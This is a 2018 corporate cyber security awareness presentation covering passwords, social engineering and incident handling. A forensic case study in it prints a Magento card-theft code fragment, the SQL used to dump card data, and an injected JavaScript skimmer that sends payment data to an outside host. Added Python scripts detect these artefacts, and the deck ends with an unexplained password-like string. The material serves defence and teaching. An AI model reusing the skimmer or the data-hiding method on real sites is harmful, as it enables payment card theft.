4/30/18
1
Cyber Security – 25th April 2018
Alan Batey, PCIP / PGCert Digital Forensics / B.A.
Forensic and IR Manager, Security Risk Management Ltd
Agenda
To provide an overview of cyber security and the effects on today's businesses:
- What is cyber security?
- Creating a culture around cyber security
- Data security measures
- Tips and best practice
What is cyber security?
Cyber security is the collection of:
- Actions
- Policies
- Training
- Guidelines
- Best practices
- Security concepts
- Technologies
- Safeguards
- Tools
- Risk management
Cyber Security Culture in business
Cyber security awareness links to information security awareness.
If you raise employees' awareness of their information security responsibilities, you will eventually change the culture within the organisation.
It is also about making information security considerations an integral part of employees' job habits and conduct, embedding them in their day-to-day actions.
Data Security in today’s environment
Hunting was necessary to survive. Making sure the good hunting areas were kept secret from other clans was essential. This ensured a plentiful supply of good food to maintain life.
Security is not a new concept..
Not long after the invention of coins, we needed security to stop, or at least easily identify, counterfeit ones.
Julius Caesar used the "shift by 3" rule when sending messages to his army, to keep them secret from his enemies.
In WW2 the Enigma device was used by the Germans to keep their troop movements and battle plans secret from the British.
Pause for thought..
In cyberspace, we have created an environment in which we, as humans, have yet to evolve the native senses to survive.
Common Security fallacies..
- "We have anti-virus software, so we're secure"
- "We have a firewall, so we're secure"
- "The most serious threats come from the outside"
- "I don't worry about security as I back up my data daily"
- "Responsibility for security falls under the IT team"
Keep calm and remember..
- The core rules haven't changed
- The environment continues to change
- We all have the tools to survive
- We just need to engage them
- We need to adjust processes and behaviours
3 basic principles..
- Confidentiality (C): protecting information from unauthorised disclosure.
- Integrity (I): protecting information from unauthorised modification.
- Availability (A): ensuring information is available to authorised users when it's needed.
Yet a great deal of mystery and intrigue still surrounds information security!
A security analogy..
Imagine driving with no traffic laws, and the chaos and danger for drivers and pedestrians!
Information security management and policies provide the same type of protection for systems and users that traffic laws provide for drivers and pedestrians: safer for the individual, beneficial for everyone!
A car, for example..
Security is like the brakes on your car: their function is to slow you down..
However, their purpose is to allow you to go fast!
The way it used to be..
One way in! One entrance to protect!
The way it is now..
Many ways in! Many entrances to protect!
So, what is a cyber security policy?
An Information Security Policy sets out users' day-to-day security responsibilities.
It relates to all employees, contractors and consultants
It dictates how sensitive information must be looked after
It is your responsibility to protect business information and know how it affects you
How does it affect me?
The problem..
- "It won't affect me"
- "Too expensive"
- Not recognising the cyber security vulnerability threat
- Not understanding the potential impact
Some stats..
- 80% of crime to businesses is now cyber
- Attacks are very methodical and precise
- SMEs are the most targeted
- Commonly preventable: causes include anti-virus updates not being applied, and a lack of internal policy, process and procedures
- On average, for every £40,000 lost per breach, only £1,000 is recovered
Infosecurity threats
- Malware
- Hacking & Denial of Service attacks
- Spyware
- Phishing
- Identity theft
- Misuse
Malware – basic steps of a breach
- Discover an unpatched CMS application.
- Upload a web shell to the server, providing a backdoor and access.
- Escalate privileges to fully compromise the web server and the payment application.
- Modify the payment application code to collect payment card information as it is processed and dump it into a file.
- Use the web shell to extract the payment card dumps.
8 out of 10 breaches we investigate are based on the Magento CMS.
Magento is the most popular CMS.
    /**
     * Return data for Centinel validation
     * @return Varien_Object
     */
    public function getCentinelValidationData()
    {
        $info = $this->getInfoInstance();
        $params = new Varien_Object();
        $params
            ->setPaymentMethodCode($this->getCode())
            ->setCardType($info->getCcType())
            ->setCardNumber($info->getCcNumber())
            ->setCardExpMonth($info->getCcExpMonth())
            ->setCardExpYear($info->getCcExpYear())
            ->setAmount($this->_getAmount())
            ->setCurrencyCode($this->_getCurrencyCode())
            ->setOrderNumber($this->_getOrderId());
        return $params;
    }

    /**
     * Store when success
     * @return bool
     */
    // Attacker-added function: the default "file" is a path under the web-served
    // media tree with a .jpg extension, so the captured card data is stored as if it
    // were a product image. The function body is not shown on the slide.
    private function _storeInfos($file = '/var/www/vhosts/ecommercesite.com/httpdocs/media/catalog/product/1/7/1678.pu_1.jpg')
    {
Image hacking
Emailed to South Korea:
Name: 17678.pu, Size: 178KB
Name: 17678.pu_1, Size: 236KB
Cut and paste
SELECT C.cardnumber, c.expiration, c.seqcode, c.cardHolder, s.address, s.city, s.stateCode, s.zip, s.digitalemailtext
FROM dbo.creditCards C, dbo.orders S
WHERE C.[idOrder] = S.[idOrder]
Card holder data from this location was then saved in four files on the desktop, named 2014.txt, 2015.txt, csv1 and Desktop.zip.
Copied out to two external websites, pastie.org and defuse.ca.
Emailed to [email protected].
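As an added example (not from the presentation), a Python scan for the three artefacts the breach slides describe: PHP source planted under the web-served media/ tree (the uploaded web shell), files with an image extension that are not images (the dump parked as 1678.pu_1.jpg), and files holding many Luhn-valid card numbers (the 2014.txt / csv1 dumps). The "/media/" path marker and the image magic bytes are assumptions about a typical Magento layout; the sample inputs in the usage section are constructed.

```python
import os
import re

# Assumed marker for Magento's web-served media tree (where the deck's disguised
# dump and uploaded web shell lived); adjust for the store being checked.
MEDIA_MARKER = "/media/"
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
PAN_RE = re.compile(rb"(?<!\d)\d{13,16}(?!\d)")


def luhn_ok(digits: bytes) -> bool:
    """Luhn check: separates card numbers from other 13-16 digit runs (IDs, timestamps)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ch - 48                      # ASCII digit -> int
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def inspect_bytes(path: str, data: bytes, pan_threshold: int = 5) -> list:
    """Return findings for one file's content; an empty list means nothing suspicious."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    # 1. Image extension but no image header: how 1678.pu_1.jpg held card data
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append("image extension but not an image")
    # 2. PHP source under media/: the footprint of an uploaded web shell
    if MEDIA_MARKER in path.replace(os.sep, "/") and b"<?php" in data:
        findings.append("php code under media/")
    # 3. Many Luhn-valid card-like numbers: a dump such as 2014.txt or csv1
    pans = sum(1 for m in PAN_RE.finditer(data) if luhn_ok(m.group(0)))
    if pans >= pan_threshold:
        findings.append(f"{pans} luhn-valid card numbers")
    return findings


def scan_tree(root: str, pan_threshold: int = 5) -> dict:
    """Walk a directory tree and map each suspicious file to its findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                hits = inspect_bytes(full, fh.read(), pan_threshold)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report
```

Run scan_tree() against a copy of the web root and the workstation profile; a real product image and a genuine order export should come back clean, while the three artefacts above are reported by file path.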
Javascript – shoplift vulnerability
The injected script as it was stored in the compromised site (a fragment: the start of the function is not on the slide, and the trailing values appear to be the remaining columns of the database row it was stored in):

    var cc = new RegExp("[09]{13,16}");
    var asd = "0";
    if (cc.test(snd)) {
        asd = "1";
    }
    var http = new XMLHttpRequest();
    http.open("POST", "https://antaras.xyz/jquery.php", true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.send("data=" + snd + "&asd=" + asd + "&id_id=ecommercesite.co.uk");
    console.clear();
    }
    snd = null;
    setTimeout('send()', 150);
    }
    // ]]></script>','2014-11-11 05:04:41','2015-07-27 16:48:03',
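An added example, not part of the deck: Python checks that flag a stored script like the one above by its traits (a 13–16 digit regex, an XMLHttpRequest/fetch call, a send to a host outside the store's own domains, console.clear() to hide traces, and a timer-driven resend). The sample fragment is constructed with a placeholder collector host, and the row labels in the usage section are made up.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injected script in the deck; the collector
# host is a placeholder, not the real one.
SAMPLE_INJECTED = """
<script>
var cc = new RegExp("[0-9]{13,16}");
var http = new XMLHttpRequest();
http.open("POST", "https://collector.example/jquery.php", true);
http.send("data=" + snd + "&id_id=shop.example");
console.clear();
setTimeout('send()', 150);
</script>
"""
# Constructed benign sample: the store's own front-end calling its own API.
SAMPLE_BENIGN = """
var x = new XMLHttpRequest();
x.open("GET", "https://shop.example/api/cart", true);
"""

URL_RE = re.compile(r"""https?://[^\s'"\\)<]+""")
CHECKS = [
    ("card-number regex", re.compile(r"(?:\\d|\[0-?9\]|\[\\d\])\{1\d,1\d\}")),
    ("XMLHttpRequest/fetch call", re.compile(r"new XMLHttpRequest\(|\bfetch\(")),
    ("console.clear() to hide traces", re.compile(r"console\.clear\(\)")),
    ("timer-driven resend", re.compile(r"setTimeout\(")),
]


def skimmer_indicators(script: str, allowed_hosts: set) -> list:
    """List the skimmer traits present in one stored script fragment."""
    hits = [name for name, rx in CHECKS if rx.search(script)]
    for url in URL_RE.findall(script):
        host = urlparse(url).hostname
        if host and host not in allowed_hosts:   # data leaving the store's own domains
            hits.append(f"sends to external host {host}")
    return hits


def flag_rows(rows: list, allowed_hosts: set, min_hits: int = 3) -> dict:
    """rows: (location, content) pairs, e.g. exported CMS blocks or config values.
    Returns {location: indicators} for rows with at least min_hits indicators."""
    flagged = {}
    for location, content in rows:
        hits = skimmer_indicators(content, allowed_hosts)
        if len(hits) >= min_hits:
            flagged[location] = hits
    return flagged


if __name__ == "__main__":
    rows = [("cms_block:footer", SAMPLE_INJECTED), ("cms_block:cart", SAMPLE_BENIGN)]
    for loc, hits in flag_rows(rows, {"shop.example"}).items():
        print(loc, hits)
```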
Email should be used for business purposes only with incidental limited personal use
Be careful of incoming emails from unknown persons, as they may contain viruses
Do not send anything inappropriate
Misuse of e-mail may also amount to racial/sexual harassment/bullying or victimisation. Even jokes and general office banter, which some people find amusing, may cause offence to others. Therefore, care should be taken when sending items such as chain letters, junk mail and jokes
The use of Internet-based e-mail is expressly forbidden.
Passwords
You are responsible for keeping your company user account secure. Passwords must NEVER be disclosed to anyone. You must not log in as another user when logging into the computer system.
- Do not write your password down
- Do not share your password with others
- Change your password if you think someone else knows it
What is a strong password?
Think of a sentence that you can remember:
“British summers are the best”
Use the first few letters of each word to create a made-up word: “brsumatb”
Add some complexity: “BrsUmatb” – add a mix of CAPS and lower case.
Substitute characters with numbers and symbols: “Br$Um4tb” – change ‘s’ to ‘$’ and change ‘a’ to ‘4’.
Over to you – try to work out a ‘strong password’ for yourself. Practise this technique; you can also use it at home and for other things for which you need to remember an important password.
Never use any dictionary words, acronyms, birthdays, sequential numbers, family names, football teams, dates, etc. – they are easily guessed!
Stealing passwords..
• social engineering, e.g. phishing; coercion
• manual password guessing, perhaps using personal information ‘cribs’ such as name, date of birth, or pet names
• intercepting a password as it is transmitted over a network
• ‘shoulder surfing’, observing someone typing in their password at their desk
• installing a keylogger
• searching an enterprise’s IT infrastructure for electronically stored password information
• brute-force attacks; the automated guessing of large numbers of passwords until the correct one is found
• finding passwords which have been stored insecurely, such as handwritten or hidden close to the device
• compromising databases containing large numbers of user passwords, then checking for re-use of these
What not to do..
Clear screen policy
Whenever you leave your desk, ALWAYS ‘lock’ your screen by pressing ‘Ctrl + Alt + Delete’, then select “Lock Workstation” and press ‘Enter’. You can also use “Windows Key” + “L” to lock your computer.
Upon your return you will be required to enter your password to unlock your machine. Only you will know this password.
If leaving your desk for any length of time, it may be more appropriate to consider logging out.
Social Engineering
“Amateurs hack systems, professionals hack people.”
Types of Social Engineering
Pretexting
The act of creating and using an invented scenario to persuade a targeted victim to release information or perform an action.
Phishing – Vishing – SMiShing
A technique of fraudulently obtaining private information.
A Favour For A Favour
Manipulating somebody to feel grateful and feel they owe the social engineer a favour.
Baiting
Just like a real-world Trojan Horse: uses physical media and relies on the curiosity or greed of the victim.
Key takeaways
- Be vigilant at all times
- Don’t disclose your password
- Make your passwords complex
- Always lock your PC
- Encrypt sensitive information
- Keep a clear desk
- Dispose of company information correctly
- Delete suspicious emails
- Do not download or install anything on your work PC
- Be mindful of physical access/shoulder surfers
What if we still have a breach?
Incident Management
Ensure you have detailed definitions. React according to a plan, regardless of whether the breach is the result of:
• An external intruder attack, or
• Unintentional damage, or
• A disgruntled employee
Each of the possible types of events, such as those listed above, should be covered in advance by adequate contingency plans.
Incident Management
If there is limited attention given to how to handle an incident, or a hasty decision-making process, the following may result:
Difficulty in:
• tracking down the incident source
• collecting evidence
• preparing for the recovery of the system, and
• protecting the valuable data contained on the system
We all have a choice..
The cyber environment is now a core part of our reality. It may be invisible and intangible – but it is active and contested.
We have two choices – to participate as an active player – or to be exploited as a resource.
Summary
We can’t prevent every attack, but we can reduce the likelihood – and make sure that we can survive when it happens.
There are 2 types of company or organisation:
- Those who have been breached
- Those who are about to be breached
Information security is a serious business.
NE14ToRcOFF33?T1m3f0R1unch!